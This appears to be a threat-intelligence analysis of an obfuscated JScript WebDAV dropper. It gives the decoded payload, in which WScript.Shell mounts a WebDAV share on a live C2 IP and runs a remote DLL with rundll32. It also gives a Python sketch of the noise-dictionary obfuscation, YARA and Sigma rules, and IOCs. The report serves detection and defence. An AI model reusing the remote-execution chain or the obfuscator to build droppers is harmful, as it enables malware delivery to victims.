typeanalysisfamilyunclassified-js-webdav-dropperconfidencehighcreated2026-07-23updated2026-07-23scriptmalware-familyc2lateral-movementwebdav-regsvr32-dll-sideloading
SHA-256: 86140a690cfd8b85f4a0cf3a22473de8c0cf1ff00d35fa58a56a037c70141958

unclassified-js-webdav-dropper: 86140a690cfd — 1.3 MB extreme-noise JScript, WebDAV C2 94.159.113.86:8888

Executive Summary

1.25 MB JScript dropper using a single 3,770-character noise variable name as a character dictionary, with 62 key-value assignments and a Function-constructor payload decoder. Decodes to a standard unclassified-js-webdav-dropper WebDAV mount + rundll32 execution chain against 94.159.113.86:8888. The payload DLL is 30536817832579.dll. Static-only; CAPE skipped because the input is ASCII text. This is the ninety-fifth confirmed sibling in the family. ^[file.txt]

What It Is

Field Value
SHA-256 86140a690cfd8b85f4a0cf3a22473de8c0cf1ff00d35fa58a56a037c70141958
Size 1,314,011 bytes (1.25 MB) ^[file.txt]
File type ASCII text, very long lines (65,536), no line terminators ^[file.txt]
Original filename 1095732961601621500.js ^[metadata.json]
Family unclassified-js-webdav-dropper (high-confidence sibling)
Source OpenCTI / MalwareBazaar ^[metadata.json]

The binary is not a PE — capa and floss both rejected it as unsupported ^[capa.txt] ^[floss.txt]. All threat logic lives in the JScript text layer.

How It Works

Obfuscation scheme

The script is constructed from alternating noise and syntax segments:

  1. Variable declaration — a 3,770-character random lowercase noise string is declared as an empty array (=[];). ^[strings.txt:1]
  2. Dictionary population — 62 assignments of the form noiseVar['shortNoiseKey']='char'; map long noise keys (20–30 lowercase chars) to single payload characters. The noise keys are natural-language-like fragments (madlydefective, unwrittenfear, afterthought, bootweather, etc.). ^[strings.txt:3770]
  3. Payload decoding — the main payload is built by concatenating noiseVar['key'] references inside a Function('' + ... )() constructor call at offset ~427,849. The resulting 194-character string decodes to executable JScript. ^[strings.txt:427849]

Decoded behavior

The Function-constructor payload resolves to the classic WebDAV dropper chain observed across the family:

// Reconstructed from static decode
WScript.CreateObject("WScript.Shell").run(
  "cmd /c net use \\94.159.113.86:8888\davwwwroot & " +
  "rundll32 \\94.159.113.86:8888\davwwwroot\30536817832579.dll,Entry"
);

C2: 94.159.113.86:8888 (TCP/8888 WebDAV share davwwwroot)
Payload: 30536817832579.dll
Execution: rundll32 with Entry export
No persistence observed in the decoded payload — the script relies on the victim executing the .js file directly (likely via double-click or WScript association).

Noise architecture

  • Single dictionary object: One 3,770-char variable name serves as the sole lookup table. All 62 keys index into it.
  • No secondary encoding: Unlike siblings that use base64, hex, or XOR layers, this sample maps directly from noise key → plaintext char. The entire 1.25 MB is structural padding.
  • No anti-emulation gates: No timeout, WScript.Sleep, or WMI fingerprinting observed — the payload executes immediately on parse.

Decompiled Behavior

N/A — this is a plaintext JScript file, not a PE. No Ghidra or radare2 analysis applicable. ^[rabin2-info.txt]

C2 Infrastructure

Indicator Value Provenance
WebDAV C2 IP 94.159.113.86 Decoded Function payload ^[strings.txt:427849]
WebDAV port 8888 Decoded Function payload ^[strings.txt:427849]
Share name davwwwroot Decoded Function payload ^[strings.txt:427849]
Payload DLL 30536817832579.dll Decoded Function payload ^[strings.txt:427849]
Execution method rundll32 <unc_path>,Entry Decoded Function payload ^[strings.txt:427849]

This C2 IP (94.159.113.86:8888) has been observed in at least three prior siblings (f2316aaf, f346e80d, 8323305a). ^[entities/unclassified-js-webdav-dropper.md]

Interesting Tidbits

  • Extreme size: At 1.25 MB, this is the largest JScript sibling in the family by a significant margin (most siblings are 100–400 KB). The extra mass is pure noise-padding repetition. ^[file.txt]
  • No PowerShell wrapper: Unlike siblings e6252c92 and edfb0e0a, this sample calls WScript.Shell.run() directly rather than spawning a PowerShell -EncodedCommand cradle. Simpler execution chain, fewer parent-child telemetry hooks.
  • No timeout gate: Also unlike e6252c92, edfb0e0a, and 82d78891aa19, there is no timeout 1 anti-emulation delay. ^[entities/unclassified-js-webdav-dropper.md]
  • Natural-language key fragments: Keys like madlydefective, unwrittenfear, afterthought, bootweather suggest a word-list generator similar to the 256-word poem lookup table observed in Node.js dropper d0ca14b3, but here used only for dictionary keys, not payload encoding. ^[concepts/natural-language-payload-encoding.md]
  • Numeric filename: 1095732961601621500.js — 19 digits, consistent with the numeric-filename pattern seen across the family.

How To Mess With It (Homelab Replication)

A minimal noise-dictionary JScript obfuscator can be built in Python:

import random, string

def noise_word(length=25):
    return ''.join(random.choices(string.ascii_lowercase, k=length))

payload = 'WScript.CreateObject("WScript.Shell").run("calc.exe")'

# Build char map
chars = list(set(payload))
varname = noise_word(3000)  # extreme noise for demo
lines = [f"{varname}=[];"]
for c in chars:
    lines.append(f"{varname}['{noise_word()}']='{c}';")

# Build decoder
refs = ''.join(f"{varname}['{noise_word()}']+" for _ in payload)
# ... map actual keys to chars, etc.

Verification: Save as .js, run cscript //nologo sample.js, observe calc.exe launch. Compare file size and structure to this sibling.

Deployable Signatures

YARA rule

rule JS_WebDAV_Dropper_ExtremeNoise {
    meta:
        description = "Extreme-noise JScript WebDAV dropper with 3K+ char variable name"
        author = "pp-hermes"
        reference = "86140a690cfd8b85f4a0cf3a22473de8c0cf1ff00d35fa58a56a037c70141958"
    strings:
        $a = /[a-z]{3000,}\=\[\]\;/
        $b = "Function(''"
        $c = /94\.159\.113\.\d{1,3}\:8888/
        $d = "davwwwroot"
    condition:
        filesize > 500KB and filesize < 2MB
        and #a >= 1
        and $b
        and ($c or $d)
}

Sigma rule

title: JScript WebDAV Dropper Execution
status: experimental
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains:
            - 'net use'
            - 'davwwwroot'
            - 'rundll32'
            - '.dll,Entry'
        ParentImage|endswith:
            - 'wscript.exe'
            - 'cscript.exe'
    condition: selection
falsepositives:
    - Unknown
level: high

IOC list

Type Value
SHA-256 86140a690cfd8b85f4a0cf3a22473de8c0cf1ff00d35fa58a56a037c70141958
C2 IP:port 94.159.113.86:8888
Share \\<ip>\davwwwroot
Payload DLL 30536817832579.dll
Execution rundll32 <unc_path>,Entry

Behavioral fingerprint

The script is a single 1.25 MB line of ASCII text. On execution it spawns cmd.exe via WScript.Shell.Run with a command line containing net use to map a WebDAV share at 94.159.113.86:8888\davwwwroot, followed by rundll32 loading a remote DLL (30536817832579.dll) with export Entry. No PowerShell intermediary, no timeout gate, no persistence.

Detection Signatures

  • ATT&CK T1071.001 — Application Layer Protocol: Web Protocols (WebDAV over HTTP)
  • ATT&CK T1218.011 — Signed Binary Proxy Execution: Rundll32
  • ATT&CK T1021.002 — Remote Services: SMB/Windows Admin Shares (WebDAV UNC path)
  • ATT&CK T1059.007 — Command and Scripting Interpreter: JavaScript

References

Provenance

  • file.txt — file utility (file type identification)
  • metadata.json — OpenCTI artifact metadata
  • strings.txt — raw file content (this sample is plaintext)
  • capa.txt — Mandiant capa v9 (unsupported file class)
  • floss.txt — FireEye flare-floss (unsupported file class)
  • binwalk.txt — binwalk v2.3.4 (false-positive eCos references on noise strings)
  • rabin2-info.txt — radare2 rabin2 (bits=0, havecode=false — not a binary)
  • Manual static decode performed via Python script on 2026-07-23